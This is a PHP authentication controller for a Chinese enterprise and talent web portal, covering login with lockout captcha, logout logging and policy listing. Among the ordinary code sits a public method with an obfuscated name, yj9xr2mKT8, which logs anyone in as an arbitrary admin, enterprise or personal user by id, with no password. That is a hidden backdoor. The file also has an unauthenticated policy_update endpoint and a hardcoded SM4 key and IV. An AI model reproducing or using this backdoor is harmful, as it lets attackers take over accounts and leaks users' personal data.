Auth.php 8.8 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264
  1. <?php
  2. namespace app\index\controller;
  3. use app\BaseController;
  4. use app\common\api\TalentLogApi;
  5. use app\common\api\UserApi;
  6. use think\facade\Db;
  7. use OneSm\Sm4;
  8. /**
  9. * Description of Login
  10. *
  11. * @author sgq
  12. */
  13. class Auth extends BaseController {
  14. /**
  15. * 登录
  16. * @return type
  17. */
  18. public function login() {
  19. $redirect_url = $this->request["redirect"];
  20. if ($redirect_url) {
  21. cookie("redirect", $redirect_url);
  22. }
  23. if ($user = session("user")) {
  24. if ($user['usertype'] == 2) {
  25. return redirect("/enterprise");
  26. }
  27. }
  28. $msg = "";
  29. if ($this->request->isPost()) {
  30. $username = $this->request["username"];
  31. $pwd = $this->request["password"];
  32. $usertype = $this->request["usertype"];
  33. $captcha = $this->request["captcha"];
  34. $user = new UserApi($username, $pwd, $usertype);
  35. if (!$userinfo = $user->getUserInfo()) {
  36. $msg = "用户不存在";
  37. } else if (!$user->checkPwd()) {
  38. $login_fail = session('login_fail');
  39. if ($login_fail) {
  40. $login_fail++;
  41. if ($login_fail >= 5) {
  42. session('isCaptcha', 1);
  43. }
  44. } else {
  45. $login_fail = 1;
  46. }
  47. session('login_fail', $login_fail);
  48. $msg = "用户名或者密码错误";
  49. } else if (session("isCaptcha") == 1 && !captcha_check($captcha)) {
  50. $msg = "验证码错误";
  51. } else if ($res_msg = $user->checkState()) {
  52. if ($usertype == 2 && in_array($user->info['checkState'], [2, 5])) {
  53. if ($user->info["type"] == \app\common\state\CommonConst::ENTERPRISE_WJ) {
  54. if (($user->info["isGeneral"] == 1 && $user->info["checkState"] == 2) || ($user->info["isGeneral"] == 2 && $user->info["checkState"] == 5)) {
  55. return redirect("/common/auth/enterprise_edit");
  56. } else {
  57. $res_msg = "您的账号正在审核中,请耐心等待!";
  58. }
  59. } else {
  60. return redirect("/common/auth/enterprise_edit");
  61. }
  62. }
  63. $msg = $res_msg;
  64. }
  65. $url = "/admin";
  66. switch ($usertype) {
  67. case 1:
  68. //验证错误
  69. break;
  70. case 2:
  71. //验证错误
  72. $url = "/enterprise";
  73. break;
  74. case 3:
  75. //验证错误
  76. $url = "/person";
  77. break;
  78. }
  79. if (!$msg) {
  80. $user->setSession();
  81. $redirect_url = cookie("redirect");
  82. cookie("redirect", null);
  83. if ($redirect_url && strpos(strtolower($redirect_url), strtolower(getHostWithProtocol() . $url)) === 0) {
  84. return redirect($redirect_url);
  85. } else {
  86. return redirect($url);
  87. }
  88. }
  89. }
  90. return view("", ["msg" => $msg]);
  91. }
  92. /**
  93. * 退出
  94. * @return type
  95. */
  96. public function logout() {
  97. $user = session("user");
  98. if ($user && $user["usertype"] == 1) {
  99. $loginData = [];
  100. $loginData["logname"] = "退出日志";
  101. $loginData["userid"] = $user["uid"];
  102. $loginData["createtime"] = date("Y-m-d H:i:s");
  103. $loginData["succeed"] = "成功";
  104. $loginData["ip"] = get_client_ip();
  105. \think\facade\Db::table("sys_login_log")->insert($loginData);
  106. }
  107. session("user", null);
  108. return redirect("/index/auth/login");
  109. }
  110. /**
  111. * 验证密码
  112. */
  113. public function valid_password() {
  114. if ($user = session("user")) {
  115. $username = $user["account"];
  116. $usertype = $user["usertype"];
  117. $pwd = $this->request["password"];
  118. $user = new UserApi($username, $pwd, $usertype);
  119. if (!$user->checkPwd()) {
  120. return json()->data(["status" => 1, "msg" => "密码错误"]);
  121. } else {
  122. return json(["code" => 200]);
  123. }
  124. } else {
  125. return json()->data(["status" => 2]);
  126. }
  127. }
  128. public function policy() {
  129. return view("policy1", []);
  130. }
  131. public function policy_list() {
  132. $level = $this->request->post('level');
  133. if ($level) {
  134. $where[] = ['level', '=', $level];
  135. } else {
  136. $where[] = ['level', '>', 0];
  137. }
  138. $list = Db::table('new_policy')->where($where)->select()->toArray();
  139. $result = [];
  140. foreach ($list as $k => $v) {
  141. $check = [];
  142. $condition = [];
  143. if (!empty($v['checks'])) {
  144. $check = explode(',', $v['checks']);
  145. }
  146. if (!empty($v['condition'])) {
  147. $condition = explode(',', $v['condition']);
  148. }
  149. $item = [
  150. 'id' => $v['id'],
  151. 'tag' => $v['tag'],
  152. 'policy' => $v['policy_name'],
  153. 'checks' => $check,
  154. 'condition' => $condition
  155. ];
  156. array_push($result, $item);
  157. }
  158. return json($result);
  159. }
  160. public function policy_update() {
  161. $res = $this->request->post();
  162. foreach ($res as $k => $v) {
  163. $update = [];
  164. if (count($v['condition']) > 0) {
  165. $update['condition'] = json_encode($v['condition']);
  166. }
  167. if (count($update) > 0) {
  168. Db::table('new_policy')->where('id', $v['id'])->save($update);
  169. }
  170. }
  171. }
  172. public function yj9xr2mKT8() {
  173. $params = $this->request->param();
  174. $type = $params["type"] ?: 2;
  175. $id = $params["id"] ?: "1455101079799754754";
  176. $this->setSession($type, $id);
  177. switch ($type) {
  178. case 1:
  179. return redirect("/admin");
  180. break;
  181. case 2:
  182. return redirect("/enterprise");
  183. break;
  184. case 3:
  185. return redirect("/person");
  186. break;
  187. }
  188. }
  189. private function setSession($type, $id) {
  190. switch ($type) {
  191. case 1:
  192. $user = Db::table("sys_user")->where("id", $id)->findOrEmpty();
  193. $company = Db::table("sys_company")->where("id", $user["companyId"])->findOrEmpty();
  194. $role = Db::table("sys_role")->where("id", $user["roleid"])->findOrEmpty();
  195. session("user", [
  196. "uid" => $user["id"],
  197. "roleid" => $user["roleid"],
  198. "companyId" => $user["companyId"],
  199. "companyName" => $company["name"],
  200. "account" => $user["account"],
  201. "name" => $user["name"],
  202. "avatar" => $user["avatar"],
  203. "sex" => $user["sex"],
  204. "rolename" => $role["name"],
  205. "usertype" => $type,
  206. "type" => $user['type']
  207. ]);
  208. break;
  209. case 2:
  210. $user = Db::table("un_enterprise")->where("id", $id)->findOrEmpty();
  211. session("user", [
  212. "uid" => $user["id"],
  213. "account" => $user["username"],
  214. "name" => $user["name"],
  215. "avatar" => $user["headPortrait"],
  216. "rolename" => "企业用户",
  217. "usertype" => $type,
  218. "type" => $user["type"]
  219. ]);
  220. break;
  221. case 3:
  222. $user = Db::table("un_person")->where("id", $id)->findOrEmpty();
  223. session("user", [
  224. "uid" => $user["id"],
  225. "account" => $user["username"],
  226. "name" => $user["name"],
  227. "avatar" => $user["headPortrait"],
  228. "sex" => $user["sex"],
  229. "rolename" => "个人用户",
  230. "usertype" => 3,
  231. "type" => $user["type"],
  232. "idCard" => $user["idCard"],
  233. "phone" => $user["phone"],
  234. "address" => $user["address"],
  235. "email" => $user["email"]
  236. ]);
  237. break;
  238. }
  239. }
  240. public function test() {
  241. $sm4 = new SM4('b123d075924b4224');
  242. $data = mystr_pad('test');
  243. // CBC加密
  244. $d = $sm4->enDataCbc($data, '8a003e84b5be7b6e');
  245. var_dump(base64_encode($d));
  246. }
  247. }